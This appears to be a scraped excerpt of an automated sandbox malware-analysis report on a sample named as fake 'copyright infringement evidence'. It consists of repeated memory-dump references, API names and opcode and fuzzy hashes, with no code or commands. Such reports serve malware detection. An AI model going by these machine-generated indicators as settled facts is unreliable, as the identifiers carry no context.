                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                                                                          • API String ID: 0-485157861
                                                                                                          • Opcode ID: 530a91db78a8d9cf70c5e3888214857f9f657ba4f8a5e2c75d98cde112ebc6d4
                                                                                                          • Instruction ID: 855c46f6cb6b392ff73836ecedd0205b00c4b26d0a9e3d996130e08a7e6d21ec
                                                                                                          • Opcode Fuzzy Hash: 530a91db78a8d9cf70c5e3888214857f9f657ba4f8a5e2c75d98cde112ebc6d4
                                                                                                          • Instruction Fuzzy Hash: 71C1A763A096A585F764DB29D1043FDA362FB457E4F829230EE9E07BE0DE7C8A14C750
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DecryptMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 1433999834-0
                                                                                                          • Opcode ID: 7cb65e6b2b63fbdadf36c5004297aaf96feb94ff3577a45e149f710ada11915b
                                                                                                          • Instruction ID: 0a55ed96ba5110ab77e6acfff63efb97f009eabae7e463f6e7dfe2315e755399
                                                                                                          • Opcode Fuzzy Hash: 7cb65e6b2b63fbdadf36c5004297aaf96feb94ff3577a45e149f710ada11915b
                                                                                                          • Instruction Fuzzy Hash: 20017C72A18BC582EB148B11E5507AAA361F798798F559322FE8C03B14DFB8D1A0CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 1a11a94c9653de49975ddde729d13d252dbc18f75c6f20b98f55723ea16cbbd2
                                                                                                          • Instruction ID: 3faa904073b74085cfad30a28813d11fbd5ea8d4120691e79ad096772fe68291
                                                                                                          • Opcode Fuzzy Hash: 1a11a94c9653de49975ddde729d13d252dbc18f75c6f20b98f55723ea16cbbd2
                                                                                                          • Instruction Fuzzy Hash: A391E232B06B8596FB11DFA4E414AE9B361FB50798F855122EE0E03B54FF78D6A6C700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9fb7a0cd18f82b8e1fcff3e9dd4cbba7b28fb92f921541980f163aeaa91a9651
                                                                                                          • Instruction ID: 6c98ed89bc1e764554471df030738e2718c9fc5544dffdda1bc5c85c05fa14de
                                                                                                          • Opcode Fuzzy Hash: 9fb7a0cd18f82b8e1fcff3e9dd4cbba7b28fb92f921541980f163aeaa91a9651
                                                                                                          • Instruction Fuzzy Hash: 82518A43B0B61247FB34661694503BA9681EB047A8FAA457AEFCE077D1DDFCD091D720
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd3b2c522d57aef6d78c24735f1d7550afa2ad50af5c204b4874132aafb9068c
                                                                                                          • Instruction ID: a8e77ce8a9c2d17efd6cf1b57cd1cbe1505a7c675f9d79b6ae8e3111ac591a79
                                                                                                          • Opcode Fuzzy Hash: cd3b2c522d57aef6d78c24735f1d7550afa2ad50af5c204b4874132aafb9068c
                                                                                                          • Instruction Fuzzy Hash: 5392A82260E68191FB60AF01E04477AF7A0FB49785F956135EA8D07FA6DFBCE0908F10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6490560f29130ffa7232aa9c786564d3aa69d1e0e06b9fb0c8da84eeb0db478d
                                                                                                          • Instruction ID: 31a6553623d517ea6831fe30142919a816226a5a99e63ee6c73569b8f14b49ac
                                                                                                          • Opcode Fuzzy Hash: 6490560f29130ffa7232aa9c786564d3aa69d1e0e06b9fb0c8da84eeb0db478d
                                                                                                          • Instruction Fuzzy Hash: D0E13522B1B20581FF55AB05D4043799651AB8DFD6FDAA131CD1D17BE1EEBCE4C28720
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5eb5434c32a26054c2e74f3fd6d3379f3af3138239d0afc55e2626eb74003c83
                                                                                                          • Instruction ID: cac8381c7b72e4c465fdc8ba76c5c1da9fd6f11882cd1da80be650afcff198c9
                                                                                                          • Opcode Fuzzy Hash: 5eb5434c32a26054c2e74f3fd6d3379f3af3138239d0afc55e2626eb74003c83
                                                                                                          • Instruction Fuzzy Hash: 36E1F662B09BC582E764DB2AA800766F3A1F7987D0F41D175DE9E47B64DF7CE0A48B00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 77bb48fbd026a2349320ebef5e5e5558aada3c2a512cd7c31e5db9e105cccaf8
                                                                                                          • Instruction ID: 3617a157b6d34fa42283b4ce026942c696dcdfa2b650eee4dd9aa4871c579cb7
                                                                                                          • Opcode Fuzzy Hash: 77bb48fbd026a2349320ebef5e5e5558aada3c2a512cd7c31e5db9e105cccaf8
                                                                                                          • Instruction Fuzzy Hash: E9E12997E4B6E142EB01663944941ACEF5183197A0BCE82B7DFA90B393E96CC50FD731
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bb1f5faae69d976d87db2f20075e48ef7ee0b8889fcbcb1dc47673ece8c8ede9
                                                                                                          • Instruction ID: 0db748cfa5d3d77f075f820898f19afc92dbddb3e5ee2bb5474ed57cfcae4d04
                                                                                                          • Opcode Fuzzy Hash: bb1f5faae69d976d87db2f20075e48ef7ee0b8889fcbcb1dc47673ece8c8ede9
                                                                                                          • Instruction Fuzzy Hash: 16B15922B0ABA141FB11EF2594002B9B7A5FB15BA8FC68170DE5D037A4DEBDD5E2C710
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7d7912e98e55e793d7e276b0d25d30777f8c2f86f76428de073de29cb53e4cc9
                                                                                                          • Instruction ID: 6851c903fed3b3f4bdf0456ccd0628ed893869f34a4eb921336d88c0000dc0f8
                                                                                                          • Opcode Fuzzy Hash: 7d7912e98e55e793d7e276b0d25d30777f8c2f86f76428de073de29cb53e4cc9
                                                                                                          • Instruction Fuzzy Hash: 72913663B1966241F7249A11EA4473EA7A1FB443A0F878135DE5E06BE0DFBCE0B0D710
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cdf98587f6d37882121fe1d0e3c01379093f8667e65261ceaad6da6ee40972e3
                                                                                                          • Instruction ID: 99eadeede8d738a8a116ada3fa114339bd7bd427a79e6b7547c9d04c99220c16
                                                                                                          • Opcode Fuzzy Hash: cdf98587f6d37882121fe1d0e3c01379093f8667e65261ceaad6da6ee40972e3
                                                                                                          • Instruction Fuzzy Hash: E7916C63A1EA6242F7249B11D404B3BAA51FB483D8F927230DE6A077E2DFBCE150D710
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 441252fcc14fc5f7fb3c09dde3615e3553dac38de7abca8b36a1921f0531837e
                                                                                                          • Instruction ID: 17b0464447068090ce892a280dce780b41b830fce52b32011318141d7e54515b
                                                                                                          • Opcode Fuzzy Hash: 441252fcc14fc5f7fb3c09dde3615e3553dac38de7abca8b36a1921f0531837e
                                                                                                          • Instruction Fuzzy Hash: 6F918A92B1E7E501FF5157696021779EA51978A7D0F89E032EDCE43BA3DE6CD201C710
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 24461f9bc336aff932f0e1f0b87fed8d86c91f2fab99be9ecb248b2545bc9208
                                                                                                          • Instruction ID: 2324ed2467c7770f48a4f65e9187c59e174cdc5218a90f1dc5aa8316f73c3c33
                                                                                                          • Opcode Fuzzy Hash: 24461f9bc336aff932f0e1f0b87fed8d86c91f2fab99be9ecb248b2545bc9208
                                                                                                          • Instruction Fuzzy Hash: E4918C63F1E7D189F72197649400BBCBF96AF21B44F8581B4CA8817BE2CB6D8125DB21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 81fd13f326fd704fd26da48a421e1b9c12aec5478836ec6e41fe077b3544eb00
                                                                                                          • Instruction ID: 516e31e9b94eefccc49881f73386d6471a83eda17e9479eb9f90ecca4d226f2d
                                                                                                          • Opcode Fuzzy Hash: 81fd13f326fd704fd26da48a421e1b9c12aec5478836ec6e41fe077b3544eb00
                                                                                                          • Instruction Fuzzy Hash: 24717B1372955242FBA87A11A41043AD691FB427B0FD3D938EEE6876D0D6BEC9E4CB10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 18170ae4bc355bd014077a573e1ef1dfb2c3eb2ef269f755d04591f0005c8538
                                                                                                          • Instruction ID: db3408d90df2e82f0df14deb7d6768c8c00d8d6d2a11587ee13cd94bb7a889b3
                                                                                                          • Opcode Fuzzy Hash: 18170ae4bc355bd014077a573e1ef1dfb2c3eb2ef269f755d04591f0005c8538
                                                                                                          • Instruction Fuzzy Hash: 2251CDE2B1ABC542FF6593A5A43237AE6559B893D0F80E073EECD47B55EE2CD2008700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 233a6e7f21ba261ce58e70e835fda17a28e1571ccaa07075e050232e21a6d850
                                                                                                          • Instruction ID: 16cb622eef3a9c8bc1890d987963e626d2bdd1fb473667cd67540485f4cf901e
                                                                                                          • Opcode Fuzzy Hash: 233a6e7f21ba261ce58e70e835fda17a28e1571ccaa07075e050232e21a6d850
                                                                                                          • Instruction Fuzzy Hash: 88517BE2B1ABD542FF5497A5652227AD6629B8D3D0F80F133EE8D47B56EE2CD2408700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09017e91b7974a86591d34dc7865da3c3d1e2653c926e2847e0af3aecc74fb00
                                                                                                          • Instruction ID: 2a0e10843d9c56584e1d92577593f1866dbf86303b77ac706a04cd53ac5d2703
                                                                                                          • Opcode Fuzzy Hash: 09017e91b7974a86591d34dc7865da3c3d1e2653c926e2847e0af3aecc74fb00
                                                                                                          • Instruction Fuzzy Hash: C7418B91F1A79902FB116AA69404BF8E242AB52FD4F818132DD0D27B98CF7CA952CB10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1a636dc85a79aa0a96f9f6d00401cc067c2964f7e9b924b7e1451436fe2086c2
                                                                                                          • Instruction ID: cb7b7f24090229a3f64e2a133f88e8af0712944c8660f03f7389a2d264899d3b
                                                                                                          • Opcode Fuzzy Hash: 1a636dc85a79aa0a96f9f6d00401cc067c2964f7e9b924b7e1451436fe2086c2
